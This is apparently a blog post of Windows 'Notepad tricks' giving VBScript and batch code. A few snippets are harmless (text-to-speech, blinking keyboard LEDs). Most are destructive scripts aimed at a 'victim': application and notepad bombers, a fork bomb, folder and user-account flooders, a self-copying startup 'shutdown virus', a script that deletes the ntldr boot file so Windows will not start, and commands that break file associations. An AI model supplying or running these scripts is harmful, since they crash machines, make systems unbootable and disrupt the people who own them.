Skip to main content

AWESOME NOTEPAD TRICKS

AWESOME NOTEPAD TRICKS



1)To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoic
e") sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.

It will prompt you for a text when u open the file, input the text and press ok."
u will hear now what u typed..

2)Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

3)Endless Notepads

This will pop up endless notepads until the computer freezes and crashes
**Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

 Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword 
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

3) Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

4) User account flooder
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

5) Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

6) Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

7) Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

8) Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

9) 
How To Make Keyboard LED Dance ?

*Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}"
loop

* Then save this file as led.vbs (.vbs is must)

* Open your save file and see your keyboard led blinking like disco lights.

How To Disable Blinking LED ?

* First open Task Manager (ctrl+alt+del)
* Then Go to process tab.
* Select wscript.exe
* Click on End process.

Comments

Popular posts from this blog

Yes We Tan: Barack Obama's tan suit sparks uproar on Twitter

Yes We Tan: Barack Obama's tan suit sparks uproar on Twitter Lol. These Americans don't have work at all. So last night US president Barack Obama held a very important press conference at the White House where he talked about very serious issues like the crimes of ISIS in Iraq and Russian's actions in Ukraine. Thing is; most people didn't care about that. They were more interested in the tan suit Obama wore to the press conference. His suit sent Twitter users into meltdown. You won't believe some of the things they wrote with the hashtag #YesWeTan.  Hilarious! See them after the cut     

10 Richest African Musician 2014 (You Need To See This)

10. Jose Chameleone Stage name Joe Chameleone,he is a popular raggae musician from Uganda and he started his career at a very young age in the early 90′s. He is regarded as the act who redefined local Ugandan music in the wake of the 21st century and is also the biggest money maker in East Africa.

Some Very Silly Things Girls Should Stop Doing

Some Very Silly Things Girls Should Stop Doing I just don’t know why many ladies indulge in these irritating behaviors 1. Asking a guy you just met for recharge card This is very annoying. It makes you look cheap. A guy met you in the afternoon, gave you a call in the evening and you are already asking him to send you a recharge card. Trust me, that guy can never respect you. He might eventually send you the recharge card, but the only thing on his mind would be to sleep with you once or twice and get rid of you. 2. Judging a guy by his looks I believe guys should be the ones that should be hell bent on beauty and physical appearance. Dont fall for a guy chiefly because he looks good physically. You need to access his acumen, sense of judgment, level-headedness, dreams etc. What makes a good guy is by far more than just looks. 3. Having s*x with a guy the day you met him This is uncalled for. You automatically lose some respect if you allow this guy to get down with you the ...